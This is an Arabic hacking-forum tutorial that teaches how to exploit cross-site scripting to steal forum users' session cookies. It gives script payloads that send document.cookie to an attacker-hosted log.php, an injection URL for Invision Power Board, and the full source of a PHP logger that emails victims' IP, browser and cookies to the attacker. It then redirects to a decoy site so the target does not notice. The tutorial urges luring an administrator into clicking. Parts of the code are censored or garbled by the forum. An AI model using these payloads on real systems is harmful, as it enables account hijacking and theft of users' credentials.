الدرس السابع استغلال ثغرة xss
بسم الله الرحمان الرحيم
كيفكم شباب اليوم معي شرح مبسط لثغرة XSS
نتابع الشرح
طيب نأتي الان الى الكود المهم في ثغرات xss
هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في ثغرات xss
الأن الكود هذا لم يكون بالثغره سوف يظهر لك الكوكيز تبعك وهو يحتوي على نقاط مهمه وهي :كود PHP:**********javascript:alert(document.******)</Script>
1- رقم العضويه
2- الباسورد مشفر md5
3 - الباسورد مشفر Hash
ورقم الاستايل وغيره ,, على حسب نوعيه البرنامج المصاب!
طيب الحين وجدت هذا الكود سوف نربطه باللوج
ماهو اللوج ؟
اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز ,, وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز تبعه باللوج او يرسل الى ايميلك ( على حسب اللوج )
طيب الان بعد ما ربطته اصبح الرابط :
تمام الان :كود PHP:**********location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>
www.xxx.com = الموقع المربوط فيه اللوج
log.php = اسم ملف اللوج
طيب الحين نرفع اللوج على اي موقع عندك وبعد كذا تستبدل
www.xxx.com/log.php برابط اللوج الي عندك
المهم الان هذا السكربت اصبح جاهزا للاستعمال سوف نضعه بكود الثغره ونستبدل :
بـكود PHP:**********javascript:alert(document.******)</Script>
الان نخلي مثلا المدير العام او اي عضو تبي تسرق الكوكيز تبعه انه يفتح الرابطكود PHP:**********location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>
بتقول كيف بقولك ياااولد انت وراااااسك عاد بطريقتك خليه يفتح الرابط
طيب الحين بتقولي والله فضيحه يا pSyCh0 لو اخليه يفتح الرابط يطلع عنده اللوج وبيكشفني
بقوله ولا يهمك اخوي نربطه كمان بموقع للتمويه
مثلا نربطه بموقع www.google.com بحيث انه لم يفتح الثغره والمربوط فيها اللوج وموقع جوجل راح يتحول اوتوماتيك الى جوجل مبسط استغلال ثغرات (موضوع تطبيق وبكذا مايشك
بتقول كيف يا pSyCh0 بقولك كذا نضع بعد رابط اللوج :
re=www.google.com&
بس مبسط استغلال ثغرات (موضوع تطبيق
بحيث يكون بعد & يوجد id ... الخ
يعني يكون الكود :
طبعا انت استبدل www.google.com باي موقع تبغاه ويفضل يكون الموقع الي مصاب فيه الثغره (1)كود PHP:**********location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>
طيب الحين تقول كذا تمام يا pSyCh0 يالله عطنا مثااال
بعطيكم مثال لثغره :Invision Power Board
الكود للثغره :
http://xxx.com/forums/index.php?act=idx='>**********alert(document.***** *)</script>
احنا راح نستبدل :
بـكود PHP:**********javascript:alert(document.******)</Script>
واستبدل هنا موقع جوجل باي موقع تبغاهكود PHP:**********location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>
ورابط اللوج www.xxx.com/log.php باللوج تبعك
====================
تطبيق :
التطبيق هنا :
اللوج :كود PHP:http://www.test.com/forums/index.php?act=idx='>**********alert(document.******)</script>
استبدل هنا :كود PHP:<?php
// Thnx For Aljyyosh Team - [url]http://www.aljyyosh.com/[/url] - [url]http://www.aljyyosh.com//vb[/url]
//----- S4a Logger v0.10 -----//
// Star
//Your Email --::--
$ToGet = "ps.y@hotmail.de";
////////////////////////////////
$Ip = $REMOTE_ADDR;
$Sys = $HTTP_USER_AGENT;
//////////////////////////////////////////////
if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();}
//
$Time = date("l dS of F Y h:i:s A");
$Hdr = 'From: Logger <logger@secourty>';
$Msg = '
Hi ,, Mr.Attacker :D
-------------------------------------------
- Thnx For Aljyyosh Team ,, For Aljyyosh Forum -
---------------------------------------------------------------------
---------------------------------------------------------------------
- IP ::- [ ' .$Ip.' ]
- System ::- [ '.$Sys.' ]
- The ****** ::- [ '.$id.' ]
- Time ::- [ '.$Time.' ]
---------------------------------------------------------------------
- root@devil00 ~ ./evilcat /etc/passwd -
- root@devil00 ~ ./s4acracker passwd --log <log.log> && -
---------------------------------------------------------------------
';
$send = mail($ToGet,'S4a - [ New****** ]',$Msg,$Hdr);
//
/* &@#&@#&@#&@#&@#&@#&@# code ,, By pSyCh0_3D [ :D ] << v0.10 */
if(isset($_GET["re"])){
$&@#&@#&@#&@#&@#&@#&@# = $_GET["re"];
if($&@#&@#&@#&@#&@#&@#&@# == ""){
mail ($ToGet,'S4a - [Error]','&@#&@#&@#&@#&@#&@#&@# Is Set And Its Empty !!',$Hdr);
}else{
header("location:".$&@#&@#&@#&@#&@#&@#&@#);
}
}
//
?>
الايميل: ps.y@hotmail.deكود PHP:$ToGet = "ps.y@hotmail.de";
بالايميل تبعك !
واحفظه بامتداد php طبعا افتح المفكره وحط الكود ولاتنسى تغير الايميل واحفظه بامتداد php
وارفعه على موقعك
رد مع اقتباس
رد: الدرس السابع استغلال ثغرة xss
المفضلات